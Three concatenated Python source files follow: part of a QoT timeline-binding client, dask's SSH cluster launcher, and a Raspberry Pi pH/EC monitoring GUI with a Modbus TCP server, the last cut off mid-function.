            retval = ReturnTypes.QOT_RETURN_TYPE_ERR
            return retval
        else:
            self._binding_id = self._tl_msg["binding"]["id"]
            print ('Binding ID is %d' % self._binding_id)
        # Send TIMELINE_SHM_CLOCK message to timeline service
        self._populate_timeline_msg_data()
        self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_SHM_CLOCK)
        if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
            print ('Failed to request timeline clock from timeline service')
            retval = ReturnTypes.QOT_RETURN_TYPE_ERR
            return retval
        else:
            # Get the timeline clock parameter file descriptor from the timeline service
            msg, shm_fd_list = self._recv_fds(20, 1)
            shm_fd = shm_fd_list[0]
            # Memory map the parameters into a byte array (read-only view the
            # service updates in place)
            self._clk_params = mmap.mmap(shm_fd, 0, flags=mmap.MAP_SHARED, prot=mmap.PROT_READ)
    print("Bound to timeline %s" % timeline_uuid)
    return retval
@checkargs
def timeline_unbind(self: object):
    '''
    * @brief Unbind from a timeline
    * @return A status code indicating success (0) or other'''
    if self._mode == "transform":
        # NATS Thread Join (the subscriber loop watches this flag)
        self._nats_thread_running = False
        self._nats_thread.join()
        # Close the AsyncIO Loop
        self._loop.close()
    else:
        # Send TIMELINE_UNBIND message to timeline service
        self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_UNBIND)
        if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
            # Fix: message previously read "unbing"
            print ('Failed to send unbind message to timeline service')
            retval = ReturnTypes.QOT_RETURN_TYPE_ERR
            return retval
        else:
            print ('Unbound from timeline service')
    return ReturnTypes.QOT_RETURN_TYPE_OK
@checkargs
def timeline_get_accuracy(self: object):
    '''
    * @brief Get the accuracy requirement associated with this binding
    * @return acc Maximum tolerable deviation from true time in nanoseconds'''
    # Returns the locally cached value set at bind time (no service round-trip)
    return self._accuracy_ns
@checkargs
def timeline_get_resolution(self: object):
    '''
    * @brief Get the resolution requirement associated with this binding
    * @return res Maximum tolerable unit of time in nanoseconds'''
    # Returns the locally cached value set at bind time (no service round-trip)
    return self._resolution_ns
@checkargs
def timeline_get_name(self: object):
    '''
    * @brief Query the name of this application binding
    * @return name Application name'''
    return self._binding_name
@checkargs
def timeline_get_uuid(self: object):
    '''
    * @brief Query the name of this timeline
    * @return name Timeline name (UUID)'''
    return self._timeline_uuid
@checkargs
def timeline_set_accuracy(self: object, acc_ns: int):
    '''
    * @brief Set the accuracy requirement associated with this binding
    * @param acc_ns Maximum tolerable deviation from true time in nanoseconds
    * @return A status code indicating success (0) or other'''
    self._accuracy_ns = acc_ns
    # In transform mode there is no service connection, so only cache locally
    if self._mode != "transform":
        # Send TIMELINE_UPDATE message to timeline service
        self._populate_timeline_msg_data()
        self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_UPDATE)
        if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
            print ('Failed to send set accuracy to timeline service')
            retval = ReturnTypes.QOT_RETURN_TYPE_ERR
            return retval
    return ReturnTypes.QOT_RETURN_TYPE_OK
@checkargs
def timeline_set_resolution(self: object, res_ns: int):
    '''
    * @brief Set the resolution requirement associated with this binding
    * @param res_ns Maximum tolerable unit of time in nanoseconds
    * @return A status code indicating success (0) or other'''
    self._resolution_ns = res_ns
    # In transform mode there is no service connection, so only cache locally
    if self._mode != "transform":
        # Send TIMELINE_UPDATE message to timeline service
        self._populate_timeline_msg_data()
        self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_UPDATE)
        if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
            # Fix: message previously said "set accuracy" (copy-paste error)
            print ('Failed to send set resolution to timeline service')
            retval = ReturnTypes.QOT_RETURN_TYPE_ERR
            return retval
    return ReturnTypes.QOT_RETURN_TYPE_OK
@checkargs
def timeline_get_coretime(self: object):
    '''
    * @brief Read the core clock (CLOCK_REALTIME)
    * @return core_now Estimated core time in fractional seconds'''
    core_now = time.clock_gettime(time.CLOCK_REALTIME)
    return core_now
@checkargs
def timeline_gettime(self: object):
    '''
    * @brief Query the time according to the timeline
    * @return est Estimated timeline time in fractional seconds with uncertainty'''
    # Read the CLOCK_REALTIME core time (nanoseconds)
    core_now_ns = int(math.floor(time.clock_gettime(time.CLOCK_REALTIME)*1000000000))
    # Unpack the Memory-mapped Clock Parameters: seven native int64s
    # (field order assumed from how _core2timeline/_compute_qot index them —
    #  TODO confirm against the timeline service's struct layout)
    params = struct.unpack('@qqqqqqq', self._clk_params)
    tl_time = dict()
    # Convert from core time to timeline time (ns -> fractional seconds)
    tl_time["time_estimate"] = float(self._core2timeline(False, core_now_ns, params))/1000000000
    # Add the Uncertainty
    tl_time["interval_above"], tl_time["interval_below"] = self._compute_qot(core_now_ns, params)
    tl_time["interval_above"] = float(tl_time["interval_above"])/1000000000
    tl_time["interval_below"] = float(tl_time["interval_below"])/1000000000
    # Return Timestamp, Upper Bound, Lower Bound
    return tl_time
@checkargs
def timeline_set_schedparams(self: object, period_ns: int, offset_ns: int):
    '''
    * @brief Set the periodic scheduling parameters associated with this binding
    * @param period_ns wakeup period in nanoseconds
    * @param offset_ns first wakeup time offset in nanoseconds
    * @return A status code indicating success (0) or other'''
    # Only caches the values locally; nothing is sent to the timeline service
    self._offset_ns = offset_ns
    self._period_ns = period_ns
    # NOTE(review): returns the bare int 0 rather than a ReturnTypes value,
    # unlike the other public calls — confirm callers treat them the same
    return 0
@checkargs
def timeline_waituntil(self: object, abs_time: float):
    '''
    * @brief Block wait until a specified uncertain point
    * @param abs_time the absolute fractional time to wake up at
    * @return Time at which the program resumes'''
    # Unpack the Memory-mapped Clock Parameters
    params = struct.unpack('@qqqqqqq', self._clk_params)
    # Translate timeline time to core time (absolute conversion)
    core_duration = float(self._timeline2core(False, int(abs_time*1000000000), params))/1000000000
    # NOTE(review): the converted value is an absolute core time but is passed
    # to sleep() as a duration — confirm the intended wakeup semantics
    time.sleep(core_duration)
    return self.timeline_gettime() # Needs to be fleshed out
@checkargs
def timeline_waituntil_nextperiod(self: object):
    '''
    * @brief Block and wait until next period
    * @return utp Returns the actual uncertain wakeup time
    Note: stub implementation — does not actually wait; it only returns the
    current timeline time.'''
    return self.timeline_gettime() # Needs to be fleshed out
@checkargs
def timeline_sleep(self: object, rel_time: float):
    '''
    * @brief Block for a specified length of uncertain time
    * @param rel_time fractional seconds time to sleep for
    * @return A status code indicating success (0) or other'''
    # Unpack the Memory-mapped Clock Parameters
    params = struct.unpack('@qqqqqqq', self._clk_params)
    # Translate the timeline-time duration to a core-time duration
    # (period_flag=True -> duration conversion, frequency correction only)
    core_duration = float(self._timeline2core(True, int(rel_time*1000000000), params))/1000000000
    # Sleep for the duration
    time.sleep(core_duration)
    return self.timeline_gettime() # Needs to be fleshed out
@checkargs
def timeline_core2rem(self: object, core_time: float):
    '''
    * @brief Converts core time to remote timeline time
    * @param core_time time to be converted, in fractional seconds
    * @return tl_time dict with "time_estimate" and the two uncertainty
      bounds ("interval_above"/"interval_below"), all in fractional seconds'''
    tl_time = dict()
    # Find the appropriate clock parameters
    if self._mode == "transform":
        # Transform mode: parameters come from the NATS-fed ring buffer and
        # are keyed dicts (last/mult/nsec in ns, u_*/l_* uncertainty terms)
        clk_params = self._find_clkparams(core_time)
        # Translate core time to timeline time
        tl_time["time_estimate"] = clk_params["nsec"] + (core_time*1000000000 - clk_params["last"]) + ((core_time*1000000000 - clk_params["last"])*(clk_params["mult"]))/1000000000
        tl_time["time_estimate"] = float(tl_time["time_estimate"])/1000000000
        # Add the uncertainty (grows with time since the last sync point)
        tl_time["interval_above"] = float((clk_params["u_mult"]*(core_time*1000000000 - clk_params["last"]))/1000000000 + clk_params["u_nsec"])/1000000000
        tl_time["interval_below"] = float((clk_params["l_mult"]*(core_time*1000000000 - clk_params["last"]))/1000000000 + clk_params["l_nsec"])/1000000000
    else:
        # App mode: parameters come from the service's shared-memory segment
        # Unpack the Memory-mapped Clock Parameters
        params = struct.unpack('@qqqqqqq', self._clk_params)
        # Translate core time to timeline time
        tl_time["time_estimate"] = float(self._core2timeline(False, int(core_time*1000000000), params))/1000000000
        # Add the uncertainty
        tl_time["interval_above"], tl_time["interval_below"] = self._compute_qot(int(core_time*1000000000), params)
        tl_time["interval_above"] = float(tl_time["interval_above"])/1000000000
        tl_time["interval_below"] = float(tl_time["interval_below"])/1000000000
    return tl_time
@checkargs
def timeline_rem2core(self: object, tl_time: float):
    '''
    * @brief Converts remote timeline time to core time
    * @param tl_time timeline time to be converted, in fractional seconds
    * @return core_time tl_time translated to core time (fractional seconds)'''
    # Unpack the Memory-mapped Clock Parameters
    params = struct.unpack('@qqqqqqq', self._clk_params)
    # Translate timeline time to core time.
    # Fix: the original referenced the undefined name 'rel_time' (NameError);
    # the parameter is 'tl_time'.
    core_time = float(self._timeline2core(False, int(tl_time*1000000000), params))/1000000000
    return core_time
# Module-level singleton binding, created in "transform" mode (clock
# parameters arrive over NATS; no timeline-service socket is opened here).
binding = TimelineBinding("transform")
def init_transform(timeline_uuid: str, app_name: str):
    '''Bind the module-level TimelineBinding to timeline_uuid under the
    given app name, demanding a fixed 1000 ns resolution and accuracy.'''
    print("Initializing transform ...")
    # Bind to the timeline
    global binding
    binding.timeline_bind(timeline_uuid, app_name, 1000, 1000)
    return
# Transformation main function invoked by Sherlock
def main(ctx,msg):
    '''Sherlock pipeline stage: translate the incoming message's core
    timestamp into timeline time with uncertainty bounds, print both, and
    forward the result (JSON-encoded) to the next stage.'''
    global binding
    global initialized
    # NOTE(review): 'initialized' must exist at module level before the first
    # call — its definition is not visible in this chunk; confirm.
    if initialized == False:
        # Initialize the Timeline Binding (once per process)
        init_transform('my_test_timeline', "qot_transform")
        initialized = True
    # Get the provided core time (Sherlock timestamps are in nanoseconds)
    sherlock_time = float(ctx._Context__msg.timestamp)/1000000000
    print('---------------------------------------------------')
    print('Received :%s: from Traffic Sensor' % str(msg))
    print('Received Timestamp from Sherlock %f' % sherlock_time)
    # Translate to Timeline Time
    tl_time = binding.timeline_core2rem(sherlock_time)
    print('Translated Timeline time is %f' % tl_time["time_estimate"])
    print('Upper Uncertainty bound is %f' % tl_time["interval_above"])
    print('Lower Uncertainty bound is %f' % tl_time["interval_below"])
    print('\n')
    # Send the data to the next stage
    ctx.send(json.dumps(tl_time).encode('utf-8'))
    return
|
ssh.py
|
from __future__ import print_function, division, absolute_import
import logging
import socket
import os
import sys
import time
import traceback
try:
from queue import Queue
except ImportError: # Python 2.7 fix
from Queue import Queue
from threading import Thread
from toolz import merge
from tornado import gen
logger = logging.getLogger(__name__)
# These are handy for creating colorful terminal output to enhance readability
# of the output generated by dask-ssh.
class bcolors:
    """ANSI escape sequences used to colorize dask-ssh terminal output.

    ENDC resets all attributes and must terminate any colored span."""
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
def async_ssh(cmd_dict):
    """Thread body: run cmd_dict['cmd'] on a remote host over SSH.

    Connects (with up to 3 retries), executes the command in an interactive
    login shell, streams its stdout/stderr lines into
    cmd_dict['output_queue'], and shuts the remote process down (Ctrl-C)
    once anything is put on cmd_dict['input_queue'].
    """
    import paramiko
    from paramiko.buffered_pipe import PipeTimeout
    from paramiko.ssh_exception import (SSHException, PasswordRequiredException)
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    retries = 0
    while True:  # Be robust to transient SSH failures.
        try:
            # Set paramiko logging to WARN or higher to squelch INFO messages.
            logging.getLogger('paramiko').setLevel(logging.WARN)
            ssh.connect(hostname=cmd_dict['address'],
                        username=cmd_dict['ssh_username'],
                        port=cmd_dict['ssh_port'],
                        key_filename=cmd_dict['ssh_private_key'],
                        compress=True,
                        timeout=20,
                        banner_timeout=20)  # Helps prevent timeouts when many concurrent ssh connections are opened.
            # Connection successful, break out of while loop
            break
        except (SSHException,
                PasswordRequiredException) as e:
            print('[ dask-ssh ] : ' + bcolors.FAIL +
                  'SSH connection error when connecting to {addr}:{port}'
                  'to run \'{cmd}\''.format(addr=cmd_dict['address'],
                                            port=cmd_dict['ssh_port'],
                                            cmd=cmd_dict['cmd']) + bcolors.ENDC)
            print(bcolors.FAIL + ' SSH reported this exception: ' + str(e) + bcolors.ENDC)
            # Print an exception traceback
            traceback.print_exc()
            # Transient SSH errors can occur when many SSH connections are
            # simultaneously opened to the same server. This makes a few
            # attempts to retry.
            retries += 1
            if retries >= 3:
                print('[ dask-ssh ] : '
                      + bcolors.FAIL
                      + 'SSH connection failed after 3 retries. Exiting.'
                      + bcolors.ENDC)
                # Connection failed after multiple attempts. Terminate this thread.
                os._exit(1)
            # Wait a moment before retrying
            print(' ' + bcolors.FAIL +
                  'Retrying... (attempt {n}/{total})'.format(n=retries, total=3) +
                  bcolors.ENDC)
            time.sleep(1)
    # Execute the command, and grab file handles for stdout and stderr. Note
    # that we run the command using the user's default shell, but force it to
    # run in an interactive login shell, which hopefully ensures that all of the
    # user's normal environment variables (via the dot files) have been loaded
    # before the command is run. This should help to ensure that important
    # aspects of the environment like PATH and PYTHONPATH are configured.
    print('[ {label} ] : {cmd}'.format(label=cmd_dict['label'],
                                       cmd=cmd_dict['cmd']))
    stdin, stdout, stderr = ssh.exec_command('$SHELL -i -c \'' + cmd_dict['cmd'] + '\'', get_pty=True)
    # Set up channel timeout (which we rely on below to make readline() non-blocking)
    channel = stdout.channel
    channel.settimeout(0.1)
    def read_from_stdout():
        """
        Read stdout stream, time out if necessary.
        """
        try:
            line = stdout.readline()
            while len(line) > 0: # Loops until a timeout exception occurs
                line = line.rstrip()
                logger.debug('stdout from ssh channel: %s', line)
                cmd_dict['output_queue'].put('[ {label} ] : {output}'.format(label=cmd_dict['label'],
                                                                             output=line))
                line = stdout.readline()
        except (PipeTimeout, socket.timeout):
            pass
    def read_from_stderr():
        """
        Read stderr stream, time out if necessary.
        """
        try:
            line = stderr.readline()
            while len(line) > 0:
                line = line.rstrip()
                logger.debug('stderr from ssh channel: %s', line)
                cmd_dict['output_queue'].put('[ {label} ] : '.format(label=cmd_dict['label']) +
                                             bcolors.FAIL + '{output}'.format(output=line) + bcolors.ENDC)
                line = stderr.readline()
        except (PipeTimeout, socket.timeout):
            pass
    def communicate():
        """
        Communicate a little bit, without blocking too long.
        Return True if the command ended.
        """
        read_from_stdout()
        read_from_stderr()
        # Check to see if the process has exited. If it has, we let this thread
        # terminate.
        if channel.exit_status_ready():
            exit_status = channel.recv_exit_status()
            cmd_dict['output_queue'].put('[ {label} ] : '.format(label=cmd_dict['label']) +
                                         bcolors.FAIL +
                                         "remote process exited with exit status " +
                                         str(exit_status) + bcolors.ENDC)
            return True
    # Wait for a message on the input_queue. Any message received signals this
    # thread to shut itself down.
    while cmd_dict['input_queue'].empty():
        # Kill some time so that this thread does not hog the CPU.
        time.sleep(1.0)
        if communicate():
            break
    # Ctrl-C the executing command and wait a bit for command to end cleanly
    start = time.time()
    while time.time() < start + 5.0:
        channel.send(b'\x03') # Ctrl-C
        if communicate():
            break
        time.sleep(1.0)
    # Shutdown the channel, and close the SSH connection
    channel.close()
    ssh.close()
def start_scheduler(logdir, addr, port, ssh_username, ssh_port, ssh_private_key, remote_python=None):
    """Launch a dask scheduler on a remote host over SSH.

    Builds the remote command line, starts a daemon async_ssh thread to run
    it, and returns the cmd_dict (augmented with that thread) used to stream
    output and signal shutdown.
    """
    cmd = '{python} -m distributed.cli.dask_scheduler --port {port}'.format(
        python=remote_python or sys.executable, port=port, logdir=logdir)
    # Optionally re-direct stdout and stderr to a logfile
    if logdir is not None:
        cmd = 'mkdir -p {logdir} && '.format(logdir=logdir) + cmd
        cmd += '&> {logdir}/dask_scheduler_{addr}:{port}.log'.format(addr=addr,
                                                                     port=port, logdir=logdir)
    # Format output labels we can prepend to each line of output, and create
    # a 'status' key to keep track of jobs that terminate prematurely.
    label = (bcolors.BOLD +
             'scheduler {addr}:{port}'.format(addr=addr, port=port) +
             bcolors.ENDC)
    # Create a command dictionary, which contains everything we need to run and
    # interact with this command.
    input_queue = Queue()
    output_queue = Queue()
    cmd_dict = {'cmd': cmd, 'label': label, 'address': addr, 'port': port,
                'input_queue': input_queue, 'output_queue': output_queue,
                'ssh_username': ssh_username, 'ssh_port': ssh_port,
                'ssh_private_key': ssh_private_key}
    # Start the thread
    thread = Thread(target=async_ssh, args=[cmd_dict])
    thread.daemon = True
    thread.start()
    return merge(cmd_dict, {'thread': thread})
def start_worker(logdir, scheduler_addr, scheduler_port, worker_addr, nthreads, nprocs,
                 ssh_username, ssh_port, ssh_private_key, nohost,
                 memory_limit,
                 worker_port,
                 nanny_port,
                 remote_python=None):
    """Launch a dask worker on worker_addr over SSH.

    Builds the remote command line (optional flags only when their values
    are set), starts a daemon async_ssh thread to run it, and returns the
    cmd_dict (augmented with that thread) used to stream output and signal
    shutdown.
    """
    cmd = ('{python} -m distributed.cli.dask_worker '
           '{scheduler_addr}:{scheduler_port} '
           '--nthreads {nthreads} --nprocs {nprocs} ')
    if not nohost:
        cmd += ' --host {worker_addr} '
    if memory_limit:
        cmd += '--memory-limit {memory_limit} '
    if worker_port:
        cmd += '--worker-port {worker_port} '
    if nanny_port:
        cmd += '--nanny-port {nanny_port} '
    cmd = cmd.format(
        python=remote_python or sys.executable,
        scheduler_addr=scheduler_addr,
        scheduler_port=scheduler_port,
        worker_addr=worker_addr,
        nthreads=nthreads,
        nprocs=nprocs,
        memory_limit=memory_limit,
        worker_port=worker_port,
        nanny_port=nanny_port)
    # Optionally redirect stdout and stderr to a logfile
    if logdir is not None:
        cmd = 'mkdir -p {logdir} && '.format(logdir=logdir) + cmd
        # Fix: the log file was previously named dask_scheduler_*, a
        # copy-paste error from start_scheduler; this is a worker log.
        cmd += '&> {logdir}/dask_worker_{addr}.log'.format(
            addr=worker_addr, logdir=logdir)
    label = 'worker {addr}'.format(addr=worker_addr)
    # Create a command dictionary, which contains everything we need to run and
    # interact with this command.
    input_queue = Queue()
    output_queue = Queue()
    cmd_dict = {'cmd': cmd, 'label': label, 'address': worker_addr,
                'input_queue': input_queue, 'output_queue': output_queue,
                'ssh_username': ssh_username, 'ssh_port': ssh_port,
                'ssh_private_key': ssh_private_key}
    # Start the thread
    thread = Thread(target=async_ssh, args=[cmd_dict])
    thread.daemon = True
    thread.start()
    return merge(cmd_dict, {'thread': thread})
class SSHCluster(object):
    """Launch a dask scheduler plus workers on remote hosts over SSH.

    Each remote process is driven by a background async_ssh thread; this
    object keeps their cmd_dicts so it can stream their output
    (monitor_remote_processes) and shut them all down (shutdown). Usable as
    a context manager — shuts everything down on exit.
    """
    def __init__(self, scheduler_addr, scheduler_port, worker_addrs, nthreads=0, nprocs=1,
                 ssh_username=None, ssh_port=22, ssh_private_key=None,
                 nohost=False, logdir=None, remote_python=None,
                 memory_limit=None, worker_port=None, nanny_port=None):
        # Remember launch parameters so add_worker can reuse them later
        self.scheduler_addr = scheduler_addr
        self.scheduler_port = scheduler_port
        self.nthreads = nthreads
        self.nprocs = nprocs
        self.ssh_username = ssh_username
        self.ssh_port = ssh_port
        self.ssh_private_key = ssh_private_key
        self.nohost = nohost
        self.remote_python = remote_python
        self.memory_limit = memory_limit
        self.worker_port = worker_port
        self.nanny_port = nanny_port
        # Generate a universal timestamp to use for log files
        import datetime
        if logdir is not None:
            logdir = os.path.join(logdir, "dask-ssh_" + datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S"))
            print(bcolors.WARNING + 'Output will be redirected to logfiles '
                  'stored locally on individual worker nodes under "{logdir}".'.format(logdir=logdir)
                  + bcolors.ENDC)
        self.logdir = logdir
        # Keep track of all running threads
        self.threads = []
        # Start the scheduler node
        self.scheduler = start_scheduler(logdir, scheduler_addr,
                                         scheduler_port, ssh_username, ssh_port,
                                         ssh_private_key, remote_python)
        # Start worker nodes
        self.workers = []
        for i, addr in enumerate(worker_addrs):
            self.add_worker(addr)
    @gen.coroutine
    def _start(self):
        # No-op coroutine kept for API compatibility with other cluster classes
        pass
    @property
    def scheduler_address(self):
        # 'host:port' string clients can connect to
        return '%s:%d' % (self.scheduler_addr, self.scheduler_port)
    def monitor_remote_processes(self):
        """Echo all remote processes' queued output until Ctrl-C."""
        # Form a list containing all processes, since we treat them equally from here on out.
        all_processes = [self.scheduler] + self.workers
        try:
            while True:
                for process in all_processes:
                    while not process['output_queue'].empty():
                        print(process['output_queue'].get())
                # Kill some time and free up CPU before starting the next sweep
                # through the processes.
                time.sleep(0.1)
            # end while true
        except KeyboardInterrupt:
            pass # Return execution to the calling process
    def add_worker(self, address):
        """Launch one additional remote worker and track its cmd_dict."""
        self.workers.append(start_worker(self.logdir, self.scheduler_addr,
                                         self.scheduler_port, address,
                                         self.nthreads, self.nprocs,
                                         self.ssh_username, self.ssh_port,
                                         self.ssh_private_key, self.nohost,
                                         self.memory_limit,
                                         self.worker_port,
                                         self.nanny_port,
                                         self.remote_python))
    def shutdown(self):
        """Signal every async_ssh thread to stop its remote process and wait."""
        all_processes = [self.scheduler] + self.workers
        for process in all_processes:
            # Any message on the input queue triggers the Ctrl-C shutdown path
            process['input_queue'].put('shutdown')
            process['thread'].join()
    def __enter__(self):
        return self
    def __exit__(self, *args):
        self.shutdown()
|
BOOT_GUI10Key.py
|
import RPi.GPIO as GPIO
import tkinter as tk
import tkinter.font as TkFont
from tkinter import *
from tkinter import ttk
import time
#from signal import pause
import threading
from AtlasOEM_PH import AtlasOEM_PH
from AtlasOEM_EC import AtlasOEM_EC
import time
from tkinter import messagebox
global fullscreen
from PIL import ImageTk,Image
from tkinter import *
global ph_HIGH
global ph_LOW
import time
import board
import digitalio
import adafruit_max31865
import os
import datetime as dt
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from tkinter import Tk, Canvas, Frame, BOTH
#from tkinter.messagebox import showinfo
import time
import threading
from AtlasOEM_PH import AtlasOEM_PH
from AtlasOEM_EC import AtlasOEM_EC
import time
import time
import board
import digitalio
import adafruit_max31865
import os
import datetime as dt
from pymodbus.server.sync import StartTcpServer, ModbusTcpServer
from AtlasOEM_PH import AtlasOEM_PH
import time
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSequentialDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from twisted.internet.task import LoopingCall
from twisted.internet import reactor
import threading
import datetime as dt
import matplotlib.pyplot as plt
import matplotlib.animation as animation
#import Read_PH_OEM
# Module-level state shared by the GUI callbacks and sensor loops
PHT = 0
ECT = 0
global number1  # no-op at module level; kept as-is
#number1 = 10
number = 0
number1 = 0
number2 = 0
number3 = 0
number4 = 0
ec_val = 0
ph_val = 0
#var10 = 0
GPIO.setwarnings(False)
# Dosing/relay output pins (values look like BCM numbering — TODO confirm;
# no GPIO.setmode() call is visible in this chunk before GPIO.setup, which
# RPi.GPIO normally requires — verify it happens elsewhere)
PH_HIGH = 4
PH_LOW = 17
EC_HIGH = 27
EC_LOW = 22
GPIO.setup(4, GPIO.OUT)
GPIO.setup(17, GPIO.OUT)
GPIO.setup(22, GPIO.OUT)
GPIO.setup(27, GPIO.OUT)
GPIO.output(EC_HIGH, GPIO.HIGH)
# MAX31865 RTD temperature sensor on SPI, chip select on D5
spi = board.SPI()
cs = digitalio.DigitalInOut(board.D5) # Chip select of the MAX31865 board.
sensor = adafruit_max31865.MAX31865(spi, cs)
def helloCallBack1():
    """Open a live matplotlib window plotting pH over time.

    Samples Read_PH_OEM.main() once per second via FuncAnimation, keeps the
    last 20 samples on screen, and blocks in plt.show() until the window is
    closed.
    """
    import Read_PH_OEM
    # Create figure for plotting
    PHTrend = plt.figure()
    ax = PHTrend.add_subplot(1, 1, 1)
    xs = []
    ys = []
    # This function is called periodically from FuncAnimation
    def animate(i, xs, ys):
        # Sample the pH circuit
        PH = round(Read_PH_OEM.main(), 2)
        # Add x and y to lists
        xs.append(dt.datetime.now().strftime('%H:%M:%S.%f'))
        ys.append(PH)
        # Limit x and y lists to 20 items. Fix: the original rebound the
        # local names (xs = xs[-20:]), which never trimmed the shared lists,
        # so they grew without bound; trim them in place instead.
        del xs[:-20]
        del ys[:-20]
        # Draw x and y lists
        ax.clear()
        ax.plot(xs, ys)
        plt.ylim(0, 14)
        plt.plot(xs, ys, marker='o', linestyle='--', color='g')
        # Format plot
        plt.xticks(rotation=45, ha='right')
        plt.subplots_adjust(bottom=0.30)
        plt.title('PH over Time')
        plt.ylabel('PH')
    # Keep a reference to the animation so it is not garbage-collected.
    # (The original also had a stray no-op 'plt' expression here — removed.)
    ani = animation.FuncAnimation(PHTrend, animate, fargs=(xs, ys), interval=1000)
    plt.show()
def helloCallBack2():
    """Open a live matplotlib window plotting EC over time (1 s interval).

    Note: local names (PHTrend, PH) were copy-pasted from the pH callback
    but the data plotted is EC from Read_EC_OEM."""
    import Read_EC_OEM
    PHTrend = plt.figure()
    ax = PHTrend.add_subplot(1, 1, 1)
    xs = []
    ys = []
    # This function is called periodically from FuncAnimation
    def animate(i, xs, ys):
        # Sample the EC circuit
        PH = round(Read_EC_OEM.main(), 2)
        # Add x and y to lists
        xs.append(dt.datetime.now().strftime('%H:%M:%S.%f'))
        ys.append(PH)
        # Limit x and y lists to 20 items
        # NOTE(review): this rebinding trims only the local names — the outer
        # xs/ys keep growing; confirm whether in-place trimming was intended
        xs = xs[-20:]
        ys = ys[-20:]
        # Draw x and y lists
        ax.clear()
        ax.plot(xs, ys)
        plt.ylim(0,5000)
        plt.plot(xs, ys, marker='o', linestyle='--', color='g')
        # Format plot
        plt.xticks(rotation=45, ha='right')
        plt.subplots_adjust(bottom=0.30)
        plt.title('EC over Time')
        plt.ylabel('EC')
    # Set up plot to call animate() function periodically
    ani = animation.FuncAnimation(PHTrend, animate, fargs=(xs, ys), interval=1000)
    plt.show()
def helloCallBack3():
    """Drive all four relay/dosing GPIO outputs (pins 4, 17, 27, 22) low."""
    for pin in (4, 17, 27, 22):
        GPIO.setup(pin, GPIO.OUT)
        GPIO.output(pin, GPIO.LOW)
#logging.basicConfig()
#log = logging.getLogger()
#log.setLevel(logging.DEBUG)
def run_server():
    """Start a Modbus/TCP server (slave id 0x02) on 0.0.0.0:5060 and
    periodically refresh its registers.

    serve_forever runs on a daemon thread; the twisted reactor drives the
    2-second LoopingCall and blocks this function.
    """
    # ----------------------------------------------------------------------- #
    # initialize your data store
    # ----------------------------------------------------------------------- #
    # di=block, co=block, hr=block, ir=block
    block1 = ModbusSequentialDataBlock(0x00, [100] * 0x0F)
    # Fix: the original line ended with a trailing comma, which made block2 a
    # one-element tuple instead of a data block.
    block2 = ModbusSequentialDataBlock(0x00, [1] * 0x04)
    store2 = ModbusSlaveContext(hr=block1, di=block2)
    slaves = {
        0x02: store2,
    }
    context = ModbusServerContext(slaves=slaves, single=False)
    # ----------------------------------------------------------------------- #
    # initialize the server information
    # ----------------------------------------------------------------------- #
    # If you don't set this or any fields, they are defaulted to empty strings.
    # ----------------------------------------------------------------------- #
    identity = ModbusDeviceIdentification()
    identity.VendorName = 'Pymodbus'
    identity.ProductCode = 'PM'
    identity.VendorUrl = 'http://github.com/riptideio/pymodbus/'
    identity.ProductName = 'Pymodbus Server'
    identity.ModelName = 'Pymodbus Server'
    # ----------------------------------------------------------------------- #
    # run the server
    # ----------------------------------------------------------------------- #
    # Refresh period (seconds) for the register-update loop
    interval = 2
    server = ModbusTcpServer(context, identity=identity,
                             address=('0.0.0.0', 5060))
    # Serve Modbus requests on a daemon thread so the reactor is not blocked
    t = threading.Thread(target=server.serve_forever, daemon=True)
    t.start()
    # NOTE(review): LoopingCall passes a=server, but updatevalues appears to
    # ignore its argument — confirm intended.
    loop = LoopingCall(f=updatevalues, a=server)
    loop.start(interval, now=True)
    reactor.run()
def updatevalues(a):
    """Poll the Atlas pH/EC circuits and the temperature probe forever,
    mirroring every reading into the Modbus server's datastore so remote
    Modbus clients can read them.

    Args:
        a: the running ModbusTcpServer; ``a.context[slave_id]`` is the
           datastore written to.

    Never returns (infinite polling loop).
    """
    PH = AtlasOEM_PH(name = "PH")  # OEM pH circuit
    EC = AtlasOEM_EC(name = "EC")  # OEM conductivity circuit
    PH.write_active_hibernate(1)   # wake the circuits so they start sampling
    EC.write_active_hibernate(1)

    def get_OEM_reading(OEM_circuit, readfunction):
        """Return a closure that yields the latest reading, re-using the
        previously cached value when no new sample is available yet."""
        reading = [1]  # one-element list acts as the closure's mutable cache

        def OEM_reading_closure():
            if OEM_circuit.read_new_reading_available():
                reading[0] = readfunction()
                # clear the flag so the circuit can raise it again when it
                # acquires the next sample
                OEM_circuit.write_new_reading_available(0)
            return reading[0]

        return OEM_reading_closure

    def get_all_EC_values():
        """Fetch the conductivity value from the EC circuit."""
        return EC.read_EC_reading()

    read_pH = get_OEM_reading(PH, PH.read_PH_reading)
    read_EC = get_OEM_reading(EC, get_all_EC_values)
    time.sleep(.5)  # give the circuits time to take their first samples

    def read_temp():
        """Read the temperature probe, rounded to one decimal place.

        NOTE(review): relies on a module-level ``sensor`` object — confirm
        it is initialised before this function runs.
        """
        return float("{0:.1f}".format(sensor.temperature))

    while True:
        ec_val = read_EC()
        ph_val = read_pH()
        temp_val = read_temp()
        time.sleep(10)  # polling period

        # Conductivity: clamp implausible spikes, then round to an int
        # suitable for a 16-bit holding register.
        ecint = float(ec_val)
        if ecint > 10000:
            ecint = 1500  # sensor glitch — substitute a sane default
        ECACT = int("{:.0f}".format(ecint))

        temp2 = int("{:.0f}".format(temp_val))

        # pH scaled by 100 so it fits an integer register (6.50 -> 650);
        # clamp impossible readings.
        pH2 = float(ph_val * 100)
